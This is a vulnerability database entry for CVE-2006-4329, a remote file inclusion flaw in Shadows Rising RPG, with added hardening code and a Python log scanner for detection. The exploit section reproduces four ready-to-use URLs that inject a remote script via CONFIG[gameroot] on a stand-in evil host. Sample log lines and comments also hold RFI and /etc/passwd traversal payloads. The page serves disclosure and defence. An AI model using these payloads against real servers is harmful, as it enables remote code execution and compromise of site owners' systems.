Shadows Rising RPG Multiple Remote File Include Vulnerabilities

Vulnerability ID: 1110862    Vulnerability type: Input validation
Published: 2006-08-20    Updated: 2006-08-26
CVE: CVE-2006-4329    CNNVD ID: CNNVD-200608-388
Platform: PHP    CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/2229
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-388
|Description
Multiple PHP remote file inclusion (RFI) vulnerabilities in Shadows Rising RPG (Pre-Alpha) 0.0.5b and earlier allow remote attackers to execute arbitrary PHP code via a URL in the CONFIG[gameroot] parameter to (1) core/includes/security.inc.php, (2) core/includes/smarty.inc.php, (3) qcms/includes/smarty.inc.php, or (4) qlib/smarty.inc.php. CONFIG[gameroot] is an entry of the application's internal $CONFIG array that these include files prepend to the path they include; it becomes attacker-controlled because the files can be requested directly (no entry script has initialised $CONFIG first) and PHP's register_globals turns the query-string parameter into that array. The standard preconditions for this bug class therefore apply: register_globals must be on for the parameter to be honoured at all, and allow_url_fopen (or, from PHP 5.2 onward, allow_url_include) must be on for a remote URL to be fetched and executed rather than failing as a local path.
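The vulnerable include pattern described above next to its hardened form, as an added example written for this page. It is not Shadows Rising RPG's own code; the function names, the `config.inc.php` target, the `SR_ENTRY` marker constant and the `$CONFIG` layout are assumptions, and only the CONFIG[gameroot] parameter and the include-file locations come from the advisory.

```php
<?php
// Added example, not code from the Shadows Rising RPG project. It reconstructs
// the register_globals-era shape the advisory describes and shows the fix.
// Assumed names: vulnerable_bootstrap, hardened_bootstrap, SR_ENTRY, config.inc.php.

// ---- vulnerable shape (assumed) ----------------------------------------
// Picture this living in core/includes/security.inc.php and being requested
// directly, so no entry script has set $CONFIG. With register_globals=On
// (off by default since PHP 4.2, but still widely enabled in 2006) the query
// string ?CONFIG[gameroot]=http://attacker.example/evil.txt creates the array,
// and with allow_url_fopen / allow_url_include=On include() fetches and runs
// the remote file.
function vulnerable_bootstrap(): void
{
    global $CONFIG;
    include $CONFIG['gameroot'] . '/core/includes/config.inc.php';
}

// ---- hardened shape -----------------------------------------------------
// 1. Refuse direct requests: the real entry script defines a marker before
//    including anything, so a bare GET to the .inc.php file stops here.
// 2. Derive the game root from the file system, never from request data, and
//    confine the include to that directory.
function hardened_bootstrap(): void
{
    if (!defined('SR_ENTRY')) {
        http_response_code(403);               // PHP 5.4+
        exit('direct access denied');
    }
    $gameroot = realpath(__DIR__ . '/../..');  // core/includes -> game root
    $target   = ($gameroot === false) ? false
              : realpath($gameroot . '/core/includes/config.inc.php');
    $prefix   = $gameroot . DIRECTORY_SEPARATOR;
    if ($target === false || strncmp($target, $prefix, strlen($prefix)) !== 0) {
        http_response_code(500);
        exit('include target outside game root');
    }
    include $target;
}

// ---- defence in depth ---------------------------------------------------
// If a root path must still come from configuration (a config file, not the
// request), insist that it is an existing local directory and not a stream
// wrapper. The wrapper list mirrors what include() will happily fetch.
function assert_local_dir(string $candidate): string
{
    if (strpos($candidate, "\0") !== false
        || preg_match('#^(?:https?|ftps?|php|data|expect|phar|zip|compress\.zlib):#i', $candidate)) {
        throw new InvalidArgumentException('gameroot must be a local path, not a URL or wrapper');
    }
    $real = realpath($candidate);
    if ($real === false || !is_dir($real)) {
        throw new InvalidArgumentException('gameroot does not exist: ' . $candidate);
    }
    return $real;
}
```

The marker check is what closes the four direct-request entry points named in the advisory; the realpath confinement is what keeps a future regression in `$CONFIG` handling from turning into file inclusion again, remote or local.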
|Exploit
/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Shadows Rising RPG (Pre-Alpha) <= 0.0.5b (CONFIG[gameroot]) Remote File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: Shadows Rising RPG (Pre-Alpha) v. 0.0.5b
- [Script site: http://sourceforge.net/projects/shadowsrising/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-          Contact: kacper1964@yahoo.pl
-                        or
-          http://www.devilteam.yum.pl/
-                       and
-           http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
-
!@ Friendship cannot be traded for petty gains @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-            Dedicated to the person
-         without whom I could not live...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
/*

Shadows Rising RPG <- GAME OVER :D

*/
#Exploit:

http://www.site.com/[ShadowsRising_path]/core/includes/security.inc.php?CONFIG[gameroot]=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[ShadowsRising_path]/core/includes/smarty.inc.php?CONFIG[gameroot]=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[ShadowsRising_path]/qcms/includes/smarty.inc.php?CONFIG[gameroot]=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[ShadowsRising_path]/qlib/smarty.inc.php?CONFIG[gameroot]=[http://www.myevilsite.com/evil_scripts.txt]

# milw0rm.com [2006-08-20]
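A detection pass over web-server access logs for the exploit URLs above, as an added example written for this page (not part of the original advisory or the exploit). The log lines are constructed samples, not captured traffic; the four script paths and the CONFIG[gameroot] parameter are the advisory's, everything else (function names, the classification labels, the IP addresses) is assumed. It goes slightly beyond the published URLs: any client-supplied CONFIG[gameroot] is flagged even without a URL value, because a legitimate client never sends that array, and a direct hit on one of the include files with no parameters is reported as reconnaissance.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# The four include files named in the advisory. A browser never requests
# them directly, so a bare hit is worth a look even without a payload.
VULNERABLE_SCRIPTS = (
    "core/includes/security.inc.php",
    "core/includes/smarty.inc.php",
    "qcms/includes/smarty.inc.php",
    "qlib/smarty.inc.php",
)

# Constructed Apache combined-format sample lines (not captured traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [20/Aug/2006:10:01:02 +0000] "GET /shadows/core/includes/security.inc.php?CONFIG[gameroot]=http://198.51.100.9/evil.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [20/Aug/2006:10:01:05 +0000] "GET /shadows/qlib/smarty.inc.php?CONFIG%5Bgameroot%5D=http%3A%2F%2F198.51.100.9%2Fevil.txt%3F HTTP/1.1" 200 498 "-" "Mozilla/4.0"
192.0.2.44 - - [20/Aug/2006:10:02:11 +0000] "GET /shadows/index.php?page=town HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.45 - - [20/Aug/2006:10:03:30 +0000] "GET /shadows/qcms/includes/smarty.inc.php HTTP/1.1" 200 0 "-" "curl/7.15"
198.51.100.20 - - [20/Aug/2006:10:04:00 +0000] "GET /shadows/core/includes/smarty.inc.php?CONFIG[gameroot]=../../../../etc/passwd%00 HTTP/1.1" 200 0 "-" "-"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Stream wrappers that make include() read code from outside the local tree
# when allow_url_include (allow_url_fopen on older PHP) is enabled.
REMOTE_WRAPPER_RE = re.compile(
    r"^(?:https?|ftps?|php|data|expect|phar|zip|compress\.zlib):", re.IGNORECASE
)


def classify_request(target: str) -> Optional[str]:
    """Return 'rfi', 'probe' or 'direct' for one request target, else None."""
    parts = urlsplit(target)
    path = parts.path.lower()
    # parse_qs percent-decodes, so CONFIG%5Bgameroot%5D and CONFIG[gameroot]
    # both arrive as the same key.
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, values in params.items():
        if key.lower() != "config[gameroot]":
            continue
        # Any client-supplied CONFIG[...] only has an effect via register_globals,
        # so even a non-URL value is hostile; a wrapper/URL value is the RFI itself.
        if any(REMOTE_WRAPPER_RE.match(v) for v in values):
            return "rfi"
        return "probe"
    if any(path.endswith(script) for script in VULNERABLE_SCRIPTS):
        return "direct"
    return None


def scan_log(log_text: str) -> List[Tuple[str, str, str]]:
    """(client_ip, classification, request_target) for every suspicious line."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = classify_request(m.group("target"))
        if verdict:
            findings.append((line.split(" ", 1)[0], verdict, m.group("target")))
    return findings


if __name__ == "__main__":
    for ip, verdict, target in scan_log(SAMPLE_LOG):
        print(f"{verdict:6} {ip:15} {target}")
```

The `probe` class catches the local-file variant of the same parameter abuse (a traversal string instead of a URL), which the advisory does not cover but which the same register_globals pattern would expose; treat a `direct` hit as low-confidence on its own and as corroboration when it comes from an IP that also produced an `rfi` or `probe` line.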
|References

Source: XF
Name: shadowsrising-configgameroot-file-include(28478)
Link: http://xforce.iss.net/xforce/xfdb/28478
Source: BID
Name: 19608
Link: http://www.securityfocus.com/bid/19608
Source: MILW0RM
Name: 2229
Link: http://www.milw0rm.com/exploits/2229
Source: VIM
Name: 20060823 source VERIFY of Shadows Rising RPG file include
Link: http://www.attrition.org/pipermail/vim/2006-August/000986.html
Source: OSVDB
Name: 28283
Link: http://www.osvdb.org/28283
Source: OSVDB
Name: 28282
Link: http://www.osvdb.org/28282